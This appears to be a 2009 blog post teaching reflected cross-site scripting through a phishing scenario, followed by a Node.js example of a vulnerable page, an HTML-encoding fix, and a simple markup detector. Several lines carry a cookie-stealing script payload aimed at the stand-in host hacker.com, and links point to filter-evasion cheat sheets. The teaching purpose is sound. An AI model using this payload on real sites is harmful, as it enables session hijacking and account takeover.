Thursday, August 6, 2009

Cross Site Scripting



Cross Site Scripting (XSS)

Cross Site Scripting (XSS) is a flaw in a website that allows an attacker to insert malicious content into the page returned by the web server. This is typically done by constructing a URL that points at the vulnerable website, crafted so that the script or HTML it carries is reflected back to whoever clicks the link. The attacker then tries to get a victim to click that link.

Let’s look at a phishing attack. A hacker, posing as the administrator of a popular site, sends you an email asking you to click a link for some fictitious reason. The link points to a page with a cross-site scripting vulnerability. The page takes the name of a product as a parameter, and if the product is not found it returns an error message saying so:

https://www.fakesite.com/products.php?product_name=cellphone

This URL returns the following simplified HTML. Note that the product name is echoed back in the HTML:

<html><body>Could not find the product cellphone</body></html>

The attacker sends you a link instead that looks like this:

http://www.fakesite.com/products.php?product_name=<script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

This URL returns the following HTML:

<html><body>Could not find the product <script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?' +document.cookie</script></body></html>

When the user clicks the link, the browser opens the target website and runs the JavaScript in the victim’s browser, which sends the victim’s cookies to the attacker’s website.

At the other end, the hacker waits for these cookies to arrive and then uses them to log in to the target website as the victim. [Source]
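As an added example (not code from the original post), here is the products.php page from the scenario rebuilt as a small Node.js handler, first reflecting product_name as-is and then HTML-encoding it for its output context. fakesite.com, products.php and product_name are the post's own names; the function names and the constructed request are assumptions for this example.

```javascript
// Encode the five characters that matter when a value lands in HTML text.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Read product_name the way the server does: URL-decoded from the query string.
function productNameFromUrl(rawUrl) {
  return new URL(rawUrl).searchParams.get('product_name') ?? '';
}

// The vulnerable page: the decoded parameter is concatenated straight into HTML,
// so any markup in it becomes part of the page the browser renders.
function renderVulnerable(rawUrl) {
  const name = productNameFromUrl(rawUrl);
  return `<html><body>Could not find the product ${name}</body></html>`;
}

// The fixed page: identical output for an ordinary product, but the parameter is
// encoded for its HTML context, so a script tag is displayed as text, not executed.
function renderSafe(rawUrl) {
  const name = productNameFromUrl(rawUrl);
  return `<html><body>Could not find the product ${htmlEncode(name)}</body></html>`;
}

// Crude server-side check for request logging: does the decoded parameter contain
// a tag? Useful for alerting, but output encoding above is the actual fix.
function looksLikeMarkup(rawUrl) {
  return /<\s*\/?\s*[a-z]/i.test(productNameFromUrl(rawUrl));
}

// Constructed requests: the two links from the post. The second is built with
// encodeURIComponent so it arrives exactly as the post's payload after decoding.
const normalUrl = 'https://www.fakesite.com/products.php?product_name=cellphone';
const attackUrl = 'http://www.fakesite.com/products.php?product_name=' +
  encodeURIComponent("<script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?' +document.cookie</script>");

console.log(renderVulnerable(attackUrl)); // script tag reflected verbatim
console.log(renderSafe(attackUrl));       // &lt;script&gt;... shown as inert text
```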


Cross-Site Scripting poses server application risks that include, but are not limited to, the following:

  • Users can unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by an attacker.

  • An attacker can take over the user session before the user's session cookie expires.

  • An attacker can connect users to a malicious server of the attacker's choice.

  • An attacker who can convince a user to access a URL supplied by the attacker could cause script or HTML of the attacker's choice to be executed in the user's browser. Using this technique, an attacker can take actions with the privileges of the user who accessed the URL, such as issuing queries against the underlying SQL databases and viewing the results, or exploiting known faulty implementations on the target system. [Source]



  • More on XSS (Cross Site Scripting)

    1. XSS (Cross Site Scripting) Prevention Cheat Sheet - XSS Prevention Rules etc

    2. The link below contains FAQs about Cross Site Scripting, such as: What is Cross Site Scripting? What are the threats of Cross Site Scripting? How common are CSS/XSS holes? What can I do to protect myself as a user?
    cgisecurity

    3. The Anatomy of Cross Site Scripting: Anatomy, Discovery, Attack, Exploitation
    net-security.org

    4. Full explanation of the cross-site scripting technique: its scope and feasibility, ways to perform (traditional) CSS attacks, securing a site against CSS attacks, how to check whether your site is protected from CSS, etc.
    XSS.pdf

    5. Fun Cross Site Scripting Example

    6. The link below covers: What is Cross Site Scripting?, the repercussions of XSS, a practical example of XSS on a test site, etc.
    windowsecurity

    7. XSS (Cross Site Scripting) Cheat Sheet
    Especially useful for filter evasion

    8. Includes Description of Cross-site scripting Vulnerabilities, How to Avoid Cross-site scripting Vulnerabilities, How to Review Code for Cross-site scripting Vulnerabilities
    Testing for Cross site scripting

    9. The link below shows how to help protect ASP.NET applications from cross-site scripting attacks by using proper input validation and by encoding the output.
    How To: Prevent Cross-Site Scripting in ASP.NET

    10. Google XSS Vulnerability - The recent cross-site scripting (XSS) vulnerability discovered in Google perfectly illustrates why character encoding matters

    11. Cross-site scripting: are your web applications vulnerable? - Includes Introduction to Cross-site scripting, an advanced cross-site scripting attack, Prevention etc (Please look under White Papers)

    12. Cross Site Scripting - Understanding the vulnerability and payload


    Also See:

    Cookie Testing
    SQL Injection